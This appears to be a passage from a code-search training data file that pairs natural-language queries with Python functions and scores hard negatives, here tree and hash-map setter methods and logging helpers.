tree\n self.update(leaf_value)", "def set(self, key, value):\n #try to lock the tree. If we succeed make sure\n #we dont lose updates from any other process\n if self._storage.lock():\n self._refresh_tree_ref()\n #get current top-level node and make a value-ref\n node = self._follow(self._tree_ref)\n value_ref = ValueRef(value)\n #insert and get new tree ref\n self._tree_ref = self._insert(node, key, value_ref)\n self._tree_ref = self._blacken(self._follow(self._tree_ref))", "def set_branch(self, value):\n self.update(value)", "def set(self, node, value):\n self.val[node] = value", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value)\n self.update(leaf_value)", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value)\n self.update(leaf_value)", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value)\n self.update(leaf_value)", "def __setitem__(self, k, v):\n #if tree is empty\n if self.is_empty():\n # inherited from LinkedBinaryTree class\n # _Item(k, v) is inheritated from MapBase class\n leaf = self._add_root(self._Item(k,v)) \n else:\n p = self._subtree_search(self.root(), k)\n #if k is present in current tree\n if p.key() == k:\n #it's not p.value()!!\n p.element()._value = v\n self._rebalance_access(p)\n return\n #didn't find k in current tree; create a new object of Item\n # and add to either left or right of the last node searched\n else:\n item = self._Item(k, v)\n if k > p.key():\n leaf = self._add_right(p, item)\n else:\n leaf = self._add_left(p, item)\n self._rebalance_insert(leaf)", "def __setitem__(self, key, value):\n if self._root:\n self._setItemHelper(key, value, self._root)\n else:\n self._root = _Node(key, value)\n self._size += 1", "def __setitem__(self, idx: int, val: float) -> None:\n assert 0 <= idx < self.capacity, f\"idx={idx} capacity={self.capacity}\"\n\n # Index of the leaf to insert into (always insert in \"second half\"\n # of the tree, the first half is reserved for already calculated\n # reduction-values).\n idx += self.capacity\n self.value[idx] = val\n\n # Recalculate all affected reduction values (in \"first half\" of tree).\n idx = idx >> 1 # Divide by 2 (faster than division).\n while idx >= 1:\n update_idx = 2 * idx # calculate only once\n # Update the reduction value at the correct \"first half\" idx.\n self.value[idx] = self.operation(\n self.value[update_idx], self.value[update_idx + 1]\n )\n idx = idx >> 1 # Divide by 2 (faster than division).", "def _put(self, k, v, currNode):\n if k < currNode.key:\n if currNode.hasLeftChild():\n self._put(k, v, currNode.leftChild)\n else:\n currNode.leftChild = TreeNode(k, v, parent=currNode)\n\n elif k > currNode.key:\n if currNode.hasRightChild():\n self._put(k, v, currNode.rightChild)\n else:\n currNode.rightChild = TreeNode(k, v, parent=currNode)\n\n else:\n currNode.payload = v\n self.size -= 1", "def __setitem__(self, key, value):\n self.tree[key] = value", "def set_node(self, n, value):\n node = self.get_node(n)\n if node:\n node.value = value", "def update(\n self, index: Union[int, np.ndarray], value: Union[float, np.ndarray]\n ):\n\n tree_index = self.capacity + index\n self._tree[tree_index] = value\n\n # Propagate up the tree.\n parent = tree_index // 2\n while np.any(parent > 0):\n left = self._tree[2 * parent] # Children/sibling.\n right = self._tree[2 * parent + 1]\n # Note: Due to possible floating point error in the sum-tree case,\n # it's safer to recompute the parent nodes directly rather than to\n # accumulate an \"update\" up the tree which could be faster.\n self._tree[parent] = self.operation(left, right)\n parent = parent // 2", "def _set(self, node_hash, keypath, value, if_delete_subtrie=False):\n # Empty trie\n if node_hash == BLANK_HASH:\n if value:\n return self._hash_and_save(\n encode_kv_node(\n keypath, self._hash_and_save(encode_leaf_node(value))\n )\n )\n else:\n return BLANK_HASH\n nodetype, left_child, right_child = parse_node(self.db[node_hash])\n # Node is a leaf node\n if nodetype == LEAF_TYPE:\n # Keypath must match, there should be no remaining keypath\n if keypath:\n raise NodeOverrideError(\n \"Fail to set the value because the prefix of it's key\"\n \" is the same as existing key\"\n )\n if if_delete_subtrie:\n return BLANK_HASH\n return self._hash_and_save(encode_leaf_node(value)) if value else BLANK_HASH\n # node is a key-value node\n elif nodetype == KV_TYPE:\n # Keypath too short\n if not keypath:\n if if_delete_subtrie:\n return BLANK_HASH\n else:\n raise NodeOverrideError(\n \"Fail to set the value because it's key\"\n \" is the prefix of other existing key\"\n )\n return self._set_kv_node(\n keypath,\n node_hash,\n nodetype,\n left_child,\n right_child,\n value,\n if_delete_subtrie,\n )\n # node is a branch node\n elif nodetype == BRANCH_TYPE:\n # Keypath too short\n if not keypath:\n if if_delete_subtrie:\n return BLANK_HASH\n else:\n raise NodeOverrideError(\n \"Fail to set the value because it's key\"\n \" is the prefix of other existing key\"\n )\n return self._set_branch_node(\n keypath, nodetype, left_child, right_child, value, if_delete_subtrie\n )\n raise Exception(\"Invariant: This shouldn't ever happen\")", "def set(self, key, value):\n try:\n assert self.capacity > 0\n\n if key not in self.cache:\n node = Node(key, value)\n self.cache[key] = node\n\n self._enqueue(node)\n self.num_elements += 1\n\n if self._full_capacity():\n dequeued = self._dequeue()\n del self.cache[dequeued.key]\n self.num_elements -= 1\n\n else:\n # Overwrite value if the key already exists\n # and re-enqueued to indicate recently used\n self.cache[key].value = value\n self._re_enqueue(self.cache[key])\n except AssertionError as error:\n print(\"WARNING: Can't perform operations on <= 0 capacity cache\")", "def put(self, key, value):\n if key is None:\n return\n self.root = put_in_subtree(self.root, key, value)\n self.root.colour = False # make sure that the root is black", "def put(self, key: int, value: int) -> None:\n idx = key % 1000\n if not self.map[idx]:\n self.map[idx] = Node(key, value)\n else:\n curr = self.map[idx]\n while True:\n if curr.key == key:\n curr.val = value\n return\n if not curr.next:\n break\n curr = curr.next\n curr.next = Node(key, value)", "def update(self, leaf_value,visits_count=1):\n # Count visit.\n self._n_visits += visits_count\n # Update Q, a running average of values for all visits.\n self._Q += 1.0*(leaf_value - self._Q) / self._n_visits\n\n if self.is_root():\n self.last_leafvalue = leaf_value", "def change_leaf_value(self, general_node, hasElement):\n raise NotImplementedError", "def update(self, tree_path, value):\n\t\traise NotImplementedError", "def cell_setLeaf(self, curr):\r\n curr.n_count = 0\r\n return", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits.\n self._Q += 1.0*(leaf_value - self._Q) / self._n_visits", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits.\n self._Q += 1.0 * (leaf_value - self._Q) / self._n_visits", "def set_val(self, k, a):\n k += self.n - 1\n self.dat[k] = a\n while k > 0:\n k = (k - 1) // 2 # parent\n self.dat[k] = self.op(self.dat[k * 2 + 1], self.dat[k * 2 + 2])", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits. wtf ??? this line is rigth but kind of wired !\n self._Q += 1.0 * (leaf_value - self._Q) / self._n_visits", "def set_child(self, val, end=False):\n self._children[val] = TrieNode(val, end)", "def __setattr__(self, key, value):\n if '_children' in self.__dict__ and\\\n key in self.__dict__['_children'] and\\\n isinstance(value, int) and\\\n hasattr(self.__dict__['_children'][key], 'value'):\n getattr(self, key).value = value\n else:\n super().__setattr__(key, value)", "def change_leaf_value(self, place, has_element_new):\n self.has_element = has_element_new", "def __setitem__(self, key, value):\n\n if self.type is None:\n self.type = type(key)\n\n if type(key) != self.type:\n raise TypeError\n\n # e.g 'bat'\n first_char = key[:1] # 'b'\n others = key[1:] # 'at'\n\n # if hit last character of key\n\n if len(first_char) != 0 and len(others) == 0:\n # if not in children, add node and assign value\n\n if first_char not in self.children:\n node = Trie(value)\n self.children[first_char] = node\n node.type = self.type\n\n # just assign value\n else:\n node = self.children[first_char]\n node.value = value\n\n else:\n if first_char not in self.children:\n node = Trie()\n # creat new node for first_char\n self.children[first_char] = node\n node[others] = value # recurse for others\n node.type = self.type\n else:\n self.children[first_char][others] = value", "def updateTreeValues ( self, feature_column, feature_value, node_type, nodes, children = [ ] ):\n self.feature_column = feature_column\n self.feature_value = feature_value\n self.node_type = node_type\n self.nodes = nodes\n self.children = children\n # End updateTreeValues()", "def __init__(self, value: object) -> None:\n self.value = value # to store node's data\n self.left = None # pointer to root of left subtree\n self.right = None # pointer to root of right subtree", "def __init__(self, value: object) -> None:\n self.value = value # to store node's data\n self.left = None # pointer to root of left subtree\n self.right = None # pointer to root of right subtree", "def __setitem__(self, ngram, value):\n #N-gram is consumed element by element from first to last and each time this function will pass the rest of the n-gram to the next node.\n #When the n-gram is completely consumed, the current node will be marked a terminating node.\n \n #Base case: N-gram fully consumed and this node is at the end of the n-gram. Mark it as a terminating node.\n if len(ngram) == 0:\n self.end_of_ngram = True\n self.value = value\n #Recursive case: N-gram is still being consumed. Move on to next node.\n else:\n next_ele = ngram[0]\n rest_ngram = ngram[1:]\n\n #Create a new child node if the next element does not lead to anywhere and recurse on it.\n if next_ele not in self.children:\n self.children[next_ele] = _NGramMapNode()\n self.children[next_ele].__setitem__(rest_ngram, value)", "def put(self, key: int, value: int) -> None:\n pos = key % self.space\n head = self.hash_table[pos]\n curr = head\n\n while curr.next:\n if curr.next.key == key:\n curr.next.val = value\n return\n curr = curr.next\n\n curr.next = Node(key, value)", "def __call__(self, value):\n self.right.left = self.__class__(value)\n self.right.left.right = self.right\n self.right = self.right.left\n self.right.left = self", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits.", "def put(self, key: int, value: int) -> None:\n\n index = self.hash(key)\n\n # If there's no other values here, just chuck it in!\n if not self.map[index]:\n self.map[index] = lNode((key, value))\n\n # Otherwise, we either need to rewrite \n # existing node or chuck on end of list - i.e. we have collision\n else:\n # Check head first since we'll need curr.next\n curr = self.map[index]\n\n # rewrite value if it exists\n if curr.val[0] == key:\n curr.val = (key, value)\n\n # Otherwise chuck on end of list\n else:\n while curr.next:\n\n # Forgot condition here...\n if curr.next.val[0] == key:\n curr.next.val = (key, value)\n return\n\n curr = curr.next\n\n curr.next = lNode((key,value))", "def _put(self, key, value, current_node):\n pass", "def push(self, value):\n idx = self.__capacity - 1 + self.__size\n self.__tree[idx] = value\n self.__update(idx)\n self.__size += 1", "def _set(self, value):\n self._local._value = value\n if threading.current_thread() is self._root_thread:\n self._root_value = value", "def put(self, key: int, value: int) -> None:\n hashvalue = key % 1000\n \n if self.hashset[hashvalue] ==None:\n \n self.hashset[hashvalue]=Node((key,value))\n else :\n head= self.hashset[hashvalue]\n while head:\n k,v = head.data \n if k==key:\n head.data = (key,value)\n return \n if head.next==None:\n break\n else:\n head = head.next\n head.next= Node((key,value))", "def addBranch(self, value, node):\n self.branches[value] = node", "def root(self, value: List[int]):\n max_len = max((len(node) for node in self._nodes))\n self._root = value + (max_len - len(value)) * [0]", "def __init__(cell, value):\n\t\tcell.value = value\n\t\tcell.parent = None\n\t\tcell.visited = False", "def setCurrentNode(self, newNode):\r\n\t\tself.currentNode = newNode", "def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None", "def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None", "def set(self, value, index=0):\n\n # Error case: Index out of acceptable range\n if index < 0 or index >= self._size:\n raise RangeError(\"index out of range.\")\n\n i = 0\n current_node = self._head\n\n while(i < index):\n current_node = current_node.next\n i += 1\n\n current_node.value = value", "def _update_value_at(self, index, value):\n node = self._get_node_at(index)\n if node is None:\n raise IndexError('List index out of range.')\n node.value = value", "def setData(self,data):\n self.data=data\n self.leaf=True", "def put(self, item, value, set_doc):\n if item is None:\n raise Exception(\"call __setitem__ with None argument\")\n else:\n self.size += 1\n self.root = self.set(self.root, item, int(value), 0, set_doc)", "def _update_node(node, value):\n node.N += 1\n node.W += value\n node.Q = node.W / node.N", "def put(self, path, leaf):\n if len(path) == 0:\n if isinstance(leaf, DiscriminationTree):\n self.interiors.append(leaf)\n self.ints[leaf.index] = leaf\n else:\n self.leaves.append(leaf)\n return True\n else:\n next_index = path[0]\n next_disc_tree = self._child_at_index(next_index)\n if next_disc_tree is None:\n next_disc_tree = DiscriminationTree(next_index, parent=self)\n self.interiors.append(next_disc_tree)\n self.ints[next_disc_tree.index] = next_disc_tree\n next_disc_tree.put(path[1:], leaf)", "def set(self, key, data, expiration=None):\n node = self._get_node(key)\n\n if node:\n node.data = data\n else:\n if len(self) + 1 > self.max_size:\n node = self._pop()\n del self.map[node.key]\n\n node = Node(key, data, expiration)\n self._append(node)\n self.map[key] = node", "def put(self, key, value):\n # O(1) in best case and O(n) in worst case Time Complexity\n # O(1) in best case and O(n) in worst case Space Complexity\n\n currentNode = self.getElement(key)\n if (currentNode.next == None):\n currentNode.next = Node(key, value)\n else:\n currentNode.next.v = value\n return", "def put(self, key: int, value: int) -> None:\n hashKey = key % 1000\n if not self.bucket[hashKey]:\n self.bucket[hashKey] = LinkNode(key, value)\n else:\n node = self.bucket[hashKey]\n while node:\n if node.pair[0] == key:\n node.pair[1] = value\n return\n if not node.next:\n node.next = LinkNode(key, value)\n node = node.next", "def put(self, k: Any, v: Any):\n i = abs(hash(k)) % self.size\n current = self.data[i]\n while current is not None:\n if current.key == k:\n current.value = v\n return\n current = current.next\n new_node = self.Node(k, v)\n new_node.next = self.data[i]\n self.data[i] = new_node", "def set(self, path, value):\n pth = self._path[:]\n pth.extend(stringify_keys(path))\n set_nested(self._request.session, pth, value)\n # self._value = get_nested_default(self._dct, self._path)\n self.save()", "def set_by_path(root, path, value):\n \n sub_data = root\n for key in path[:-1]:\n sub_data = sub_data[key]\n sub_data[path[-1]] = value", "def set(self, key, value):\n validate_is_bytes(key)\n validate_is_bytes(value)\n\n self.root_hash = self._set(self.root_hash, encode_to_bin(key), value)", "def insert(self, val):\n if type(val) not in [int, float]:\n raise TypeError('This tree accepts numbers only.')\n if self.contains(val):\n raise ValueError('Node already in tree.')\n new_node = Node(val)\n if self._size == 0:\n self._root = new_node\n self._max_depth = 1\n self._rbal = 1\n self._lbal = 1\n else:\n current_depth = 1\n current_node = self._root\n while val is not current_node._data:\n current_depth += 1\n if val < current_node._data:\n if current_node._lkid:\n current_node = current_node._lkid\n else:\n current_node._lkid = new_node\n new_node._parent = current_node\n self._get_new_max()\n elif val > current_node._data:\n if current_node._rkid:\n current_node = current_node._rkid\n else:\n current_node._rkid = new_node\n new_node._parent = current_node\n self._get_new_max()\n self._size += 1", "def __setitem__(self, i: int, o: 'Tree') -> None:\n ...", "def __setitem__(self, t: Tuple[int, ...], o: 'Tree') -> None:\n ...", "def __init__(self, liste_leaf):\r\n list_leaf = liste_leaf\r\n while len(list_leaf) != 1:\r\n first_node = list_leaf[0]\r\n second_node = list_leaf[1]\r\n new_node = Node(first_node.freq + second_node.freq,\r\n None, first_node, second_node)\r\n del list_leaf[1]\r\n del list_leaf[0]\r\n position = 0\r\n for index in range(0, len(list_leaf), 1):\r\n if new_node.freq >= list_leaf[index].freq:\r\n position += 1\r\n list_leaf.insert(position, new_node) \r\n self.root = list_leaf[0]\r\n #root attribute of the tree giving us the whole tree\r", "def assign(self, var, value):\n\t\tself._root = self._insert(self._root, var, value)", "def __setitem__(self, key, value):\n\n fi = self.arbor.field_info[key]\n ftype = fi.get('type')\n if ftype not in ['analysis', 'analysis_saved']:\n raise ArborUnsettableField(key, self.arbor)\n\n vector_fieldname = fi.get(\"vector_fieldname\", None)\n has_vector_field = vector_fieldname is not None\n\n if self.is_root:\n root = self\n tree_id = 0\n # if root, set the value in the arbor field storage\n self.arbor[key][self._arbor_index] = value\n if has_vector_field and vector_fieldname in self.arbor.field_data:\n del self.arbor.field_data[vector_fieldname]\n else:\n root = self.root\n tree_id = self.tree_id\n self.arbor._node_io.get_fields(self, fields=[key],\n root_only=False)\n data = root.field_data[key]\n data[tree_id] = value\n if has_vector_field and vector_fieldname in root.field_data:\n del root.field_data[vector_fieldname]", "def __init__(self, root_value):\n self.root = self.TreeNode(value=root_value)", "def __setitem__(self,key,value):\n assert isinstance(key,int)\n if isinstance(value,str):\n super().__setitem__(key,Node(key,value))\n else:\n assert value.nodeid == key\n super().__setitem__(key,value)", "def insertnode(self, node_path, node_val):\n\t\t# Get to the correct tree\n\t\tcurr_tree = self\n\t\tfor node_name in node_path[1:]:\n\t\t\tcurr_tree = curr_tree[node_name]\n\t\t\n\t\t# Allocate to tree (only once)\n\t\tif curr_tree.name == None:\n\t\t\tcurr_tree.name = node_path[-1]\n\t\t\tcurr_tree.value = node_val\n\t\telse:\n\t\t\tprint curr_tree.name\n\t\t\tprint node_path\n\t\t\tassert(False)", "def setval(self, newval) -> None:\n if self.val is None:\n self.val = newval\n else:\n raise RuntimeError('LocNode value set twice!')", "def insert(self, val):\n if not self.root:\n self.root = Node(val)\n self.size_number += 1\n else:\n self._sink(val, self.root)\n # check parent from node, until unbalanced.", "def set_value(self, key: keyType, new_value: valueType) -> None:\n self.validate(key, new_value)\n head_node_index, chain_node_index = self.exist_key(key)\n # \"head_node_index is equal to -1\" means that 'key' doesn't exist in dictionary object.\n if head_node_index == -1:\n self.add(key, new_value)\n else:\n self.hashTable[head_node_index].singlyLinkedList[chain_node_index].values = [new_value]", "def update_node(node, attribute, value):\n node.set(attribute, value)\n return", "def __init__(self, value, parent = None):\n # initialize new node\n self.value = value\n self.parent = parent\n self.left = None\n self.right = None\n self.height = 1", "def backPropogation(self, leafNode, value):\n node = leafNode\n while node != None:\n node.witnessValue(value)\n node = node.parent", "def add(self, value):\n # no root node: add node as root\n if self.root == None:\n self.root = Node(value, None)\n return\n\n # root already exists: find place of node to be added\n node = self.root\n while True:\n\n # left child: check if is already a leaf or not\n if value <= node.value:\n\n # current node is a leaf: add new node as left child\n if node.left == None:\n node.left = Node(value, node)\n self.rebalance(node)\n break\n\n # current node is not a leaf: descend to left child\n node = node.left\n\n # right child: check if is already a leaf or not\n else:\n\n # current node is a leaf: add new node as right child\n if node.right == None:\n node.right = Node(value, node)\n self.rebalance(node)\n break\n\n # current node is not a leaf: descend to right child\n node = node.right", "def put(self, key, value):\n index = key % self.size\n\n if not self.bucket[index]:\n self.bucket[index] = ListNode(key , value)\n else:\n cur = self.bucket[index]\n\n while cur:\n if cur.key == key:\n cur.val = value\n return\n if not cur.next: break\n cur = cur.next\n cur.next = ListNode(key, value)", "def set_node_value(self, val, i: int, j: int, key: str = 'target') -> None:\n if key not in self._dist:\n raise KeyError('key parameter must be a valid distribution: ' +\n '[\\'initial\\', \\'current\\', \\'target\\']')\n\n elif not self._status['target'] or not self._status['initial']:\n raise ValueError(\n 'No initial or target distribution has been defined.')\n\n mat_i, mat_j = to_matrix(self._param['n_v'], np.array([i, j]))\n self._dist[key][mat_i, mat_j] = val", "def add(self, value: object) -> None:\n if self.root is None: # If tree is empty\n self.root = TreeNode(value)\n return\n\n child_node = self.root\n parent_node = None\n while child_node is not None: # Traversing the tree\n parent_node = child_node\n if value < child_node.value:\n child_node = child_node.left\n\n else:\n child_node = child_node.right\n\n if value < parent_node.value:\n parent_node.left = TreeNode(value) # Add new node as child of parent\n\n else:\n parent_node.right = TreeNode(value)", "def __setitem__(self, key, value):\n list.__setitem__(self, key, self.convertNode(value))", "def put(self, key: int, value: int) -> None:\n index = key % 10000\n head = self.array[index]\n while head.next:\n head = head.next\n if head.key == key:\n head.value = value\n return\n head.next = LinkedListNode(key, value)", "def __setitem__(self, index, value):\n if isinstance(index, slice):\n del self[index]\n offset = 0\n if len(self) == 0:\n for x in value:\n self.append(x)\n else:\n for x in xrange(*index.indices(len(self))):\n self.__insert(x + offset, value)\n offset += value.length\n if not index.step:\n break\n return\n\n self.__verify_index(index)\n\n if index < 0:\n index += self.length\n\n index, prev_node, cur_node = self.__find_node_index(index)\n cur_node.data_list[index] = value", "def set(self, key, value):\r\n if not isinstance(key, str):\r\n raise TypeError(\"Key must be a string\")\r\n\r\n bin_num = self._get_bin(key)\r\n cur = self.bins[bin_num]\r\n\r\n if cur.next is None: # If first element is trailer node, insert here\r\n self._ensure_load()\r\n self.bins[bin_num] = Node((key, value), cur)\r\n success = True\r\n elif cur.value[0] == key: # If existing key, overwrite\r\n cur.value = (cur.value[0], value)\r\n success = False\r\n else: # Move towards end of linked list\r\n while cur.next is not None:\r\n prev = cur\r\n cur = cur.next\r\n self._ensure_load()\r\n prev.next = Node((key, value), cur)\r\n success = True\r\n\r\n if success:\r\n self.size += 1\r\n return success", "def backup(self, value):\n current = self\n while current.parent is not None:\n value *= -1\n current.number_visits += 1\n current.total_value += value\n current = current.parent", "def assign(self, value):\n self.value = value", "def _set_item_impl(self, key: Any, value: Any) -> None:\n from omegaconf.omegaconf import _maybe_wrap\n\n from .nodes import AnyNode, ValueNode\n\n if isinstance(value, Node):\n do_deepcopy = not self._get_flag(\"no_deepcopy_set_nodes\")\n if not do_deepcopy and isinstance(value, Container):\n # if value is from the same config, perform a deepcopy no matter what.\n if self._get_root() is value._get_root():\n do_deepcopy = True\n\n if do_deepcopy:\n value = copy.deepcopy(value)\n value._set_parent(None)\n\n try:\n old = value._key()\n value._set_key(key)\n self._validate_set(key, value)\n finally:\n value._set_key(old)\n else:\n self._validate_set(key, value)\n\n if self._get_flag(\"readonly\"):\n raise ReadonlyConfigError(\"Cannot change read-only config container\")\n\n input_config = isinstance(value, Container)\n target_node_ref = self._get_node(key)\n special_value = value is None or value == \"???\"\n\n input_node = isinstance(value, ValueNode)\n if isinstance(self.__dict__[\"_content\"], dict):\n target_node = key in self.__dict__[\"_content\"] and isinstance(\n target_node_ref, ValueNode\n )\n\n elif isinstance(self.__dict__[\"_content\"], list):\n target_node = isinstance(target_node_ref, ValueNode)\n # We use set_value if:\n # 1. Target node is a container and the value is MISSING or None\n # 2. Target node is a container and has an explicit ref_type\n # 3. If the target is a NodeValue then it should set his value.\n # Furthermore if it's an AnyNode it should wrap when the input is\n # a container and set when the input is an compatible type(primitive type).\n\n should_set_value = target_node_ref is not None and (\n (\n isinstance(target_node_ref, Container)\n and (special_value or target_node_ref._has_ref_type())\n )\n or (target_node and not isinstance(target_node_ref, AnyNode))\n or (isinstance(target_node_ref, AnyNode) and is_primitive_type(value))\n )\n\n def wrap(key: Any, val: Any) -> Node:\n is_optional = True\n if not is_structured_config(val):\n ref_type = self._metadata.element_type\n else:\n target = self._get_node(key)\n if target is None:\n if is_structured_config(val):\n ref_type = self._metadata.element_type\n else:\n is_optional = target._is_optional()\n ref_type = target._metadata.ref_type\n return _maybe_wrap(\n ref_type=ref_type,\n key=key,\n value=val,\n is_optional=is_optional,\n parent=self,\n )\n\n def assign(value_key: Any, val: ValueNode) -> None:\n assert val._get_parent() is None\n v = val\n v._set_parent(self)\n v._set_key(value_key)\n self.__dict__[\"_content\"][value_key] = v\n\n if input_node and target_node:\n # both nodes, replace existing node with new one\n assign(key, value)\n elif not input_node and target_node:\n # input is not node, can be primitive or config\n if should_set_value:\n self.__dict__[\"_content\"][key]._set_value(value)\n elif input_config:\n assign(key, value)\n else:\n self.__dict__[\"_content\"][key] = wrap(key, value)\n elif input_node and not target_node:\n # target must be config, replace target with input node\n assign(key, value)\n elif not input_node and not target_node:\n if should_set_value:\n self.__dict__[\"_content\"][key]._set_value(value)\n elif input_config:\n assign(key, value)\n else:\n self.__dict__[\"_content\"][key] = wrap(key, value)", "def update(self, feature_col, feature_value, node_type, nodes, children=[]):\n self.feature_col = feature_col\n self.feature_value = feature_value\n self.node_type = node_type\n self.nodes = nodes\n self.children = children", "def enqueue(self, value): ################# <-\n self.top = Node(value, next=self.top)", "def enqueue(self, value): ################# <-\n self.top = Node(value, next=self.top)", "def _finalize_leaf(self, node):\n node.value = -self.shrinkage * node.sum_gradients / (\n node.sum_hessians + self.splitter.l2_regularization)\n self.finalized_leaves.append(node)", "def set(cls, hierarchical_dict: dict, key: str, value: Any) -> None:\n # split according to '.'\n hierarchical_key = key.split(\".\")\n\n # go over the the dictionary according to the path, create the nodes that does not exist\n element = hierarchical_dict\n for key in hierarchical_key[:-1]:\n if key not in element:\n element[key] = {}\n element = element[key]\n\n # set the value\n element[hierarchical_key[-1]] = value", "def _set_entry(self, cvs_path, node):\n\n self._make_writable()\n self._set_entry(cvs_path, node)", "def set(self, key, value):\n self.log.debug(\"setting '%s' = '%s' on network\" % (key, value))\n dkey = digest(key)\n node = Node(dkey)\n\n def store(nodes):\n self.log.info(\"setting '%s' on %s\" % (key, list(map(str, nodes))))\n # if this node is close too, then store here as well\n if self.node.distanceTo(node) < max([n.distanceTo(node) for n in nodes]):\n self.storage[dkey] = value\n ds = [self.protocol.callStore(n, dkey, value) for n in nodes]\n d = defer.DeferredList(ds)\n d.addCallback(self._anyRespondSuccess)\n d.addErrback(self.onError)\n return d\n\n nearest = self.protocol.router.findNeighbors(node)\n if len(nearest) == 0:\n self.log.warning(\"There are no known neighbors to set key %s\" % key)\n return defer.succeed(False)\n spider = NodeSpiderCrawl(self.protocol, node, nearest, self.ksize, self.alpha)\n d = spider.find()\n d.addCallback(store)\n d.addErrback(self.onError)\n return d", "def set_value(self, new_value, borrow=False):\r\n if borrow:\r\n self.container.value = new_value\r\n else:\r\n self.container.value = copy.deepcopy(new_value)", "def update(self, value):\n orig = get_nested_default(self._request.session, self._path)\n orig.update(value)\n set_nested(self._request.session, self._path, orig)\n # self._value = get_nested_default(self._session, self._path)\n self.save()", "def __init__(self, capacity):\n assert isinstance(capacity, int)\n if capacity <= 0:\n raise ValueError(\n 'Sum tree capacity should be positive. Got: {}'.format(capacity))\n\n self.nodes = []\n self.depth = int(np.ceil(np.log2(capacity)))\n self.low_idx = (2**self.depth) - 1 # pri_idx + low_idx -> tree_idx\n self.high_idx = capacity + self.low_idx\n self.nodes = np.zeros(2**(self.depth + 1) - 1) # Double precision.\n self.capacity = capacity\n\n self.highest_set = 0\n\n self.max_recorded_priority = 1.0", "def add(self, value: object) -> None:\n #binary search tree == empty\n if self.root is None:\n self.root = TreeNode(value)\n return\n\n #variables loop/traverse bt\n child = self.root\n parent = None\n\n # place node via while loop\n while child is not None:\n parent = child\n if value < child.value:\n child = child.left\n else:\n child = child.right\n\n #new_node/ child\n if value < parent.value:\n parent.left = TreeNode(value)\n else:\n parent.right = TreeNode(value)" ]
[ "0.7562629", "0.7099471", "0.6929827", "0.6921371", "0.6896148", "0.6799146", "0.67869157", "0.67869157", "0.67869157", "0.6710561", "0.6672968", "0.66426194", "0.6601433", "0.6589014", "0.6578079", "0.6524441", "0.6495659", "0.6437595", "0.64201003", "0.64104587", "0.6396286", "0.6373545", "0.6369641", "0.6339456", "0.6285748", "0.62675416", "0.6254328", "0.62269247", "0.6222375", "0.61851555", "0.617066", "0.61464065", "0.6110882", "0.60962814", "0.60962814", "0.6093855", "0.6076747", "0.6063582", "0.6053885", "0.6032814", "0.6009327", "0.59968746", "0.5995155", "0.59796727", "0.5973542", "0.5952178", "0.59308094", "0.5921715", "0.5913448", "0.5913448", "0.5908517", "0.5900128", "0.58977926", "0.587683", "0.58759683", "0.5871815", "0.5856347", "0.58467656", "0.5832517", "0.58318067", "0.58288276", "0.5820516", "0.58172226", "0.5815473", "0.5804777", "0.5801571", "0.57943445", "0.5793195", "0.5792095", "0.579162", "0.57738376", "0.57605845", "0.5759506", "0.5751753", "0.5750151", "0.5745045", "0.57059705", "0.5698944", "0.5694283", "0.56734765", "0.56565046", "0.56483835", "0.5623632", "0.5617265", "0.56148946", "0.5604969", "0.5601191", "0.55979514", "0.55905575", "0.5588806", "0.55789", "0.55789", "0.557822", "0.557539", "0.55696595", "0.55618584", "0.55544835", "0.5553457", "0.55407465", "0.55398864" ]
0.63829994
21
Logs message for given level
def log_message(msg, lvl='info'): extra = { 'remote_addr': request.remote_addr, 'url': request.url_rule } loggers = { 'warning': current_app.logger.warning, 'info': current_app.logger.info, 'debug': current_app.logger.debug, 'error': current_app.logger.error, 'critical': current_app.logger.critical } loggers[lvl](msg, extra=extra)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __log(level, message):\n if level == 1:\n logging.info(\" \" + str(datetime.datetime.now()) + \" \" + message)\n if level == 2:\n logging.error(\" \" + str(datetime.datetime.now()) + \" \" + message)\n if level == 3:\n logging.critical(\" \" + str(datetime.datetime.now()) + \" \" + message)", "def log(self, message, level=None):\n\n if level is None or level.lower() == \"all\":\n level = \"notset\"\n level = getattr(logging, level.upper())\n\n self.logger.log(level, message)", "def log(message, level=\"INFO\"):\r\n print(__get_formatted(message, level))", "def log(self, msg, logging_level):\n\n # log\n self.logger.log(logging_level, msg)", "def log( loglevel, message ):\n E.log( loglevel, message )", "def logs_add_message(self, level, message):\n pass", "def write_log(self, level, message): \n \n level = level.lower()\n #print(level, message,str(self.logger))\n if level == 'debug':\n self.logger.debug('%s', message)\n elif level == 'error':\n self.logger.error('%s', message)\n elif level == 'critical':\n self.logger.critical('%s', message)\n elif level == 'warning':\n self.logger.warning('%s', message)\n else:\n self.logger.info('%s', message)", "def log(self, level, msg, *args, **kwargs):\n\n if self.logger:\n self.logger.log(level, msg, *args, **kwargs)", "def log(self, level: Level, message: str):\n\n try:\n Level(level)\n except ValueError:\n raise ValueError(\"LEVEL parameter must be a Level enum\")\n\n if level == Level.OFF:\n raise ValueError(\"OFF level should only be used to prevent the logger to send any message\")\n\n if self.enabled_for(level):\n _fmt = self._fmt.format(\n datetime=datetime.datetime.fromtimestamp(time.time()),\n level=level.name,\n message=message\n )\n\n # We force the message to be written instantly\n print(_fmt, file=self._output, flush=True)\n if self._tee:\n print(_fmt, flush=True)\n\n os.sync()", "def log(self, level, msg, *args, **kwargs):\n pass", "def log(self, level, msg, *args, **kwargs):\n self._logger.log(level, msg, *args, **kwargs)", "def log(self, msg, level=LOG_INFO):\n self.send_command('log', {\n 'msg': msg,\n 'level': level,\n })", "def logging(cls, lvl, message):\n log = getattr(logging, lvl)\n message = '[{}] {}'.format(cls.__name__, message)\n log(message)", "def log(self, api, msg, level):\n return succeed(log.msg(msg, logLevel=level))", "def logmsg(self, lvl, msg):\n 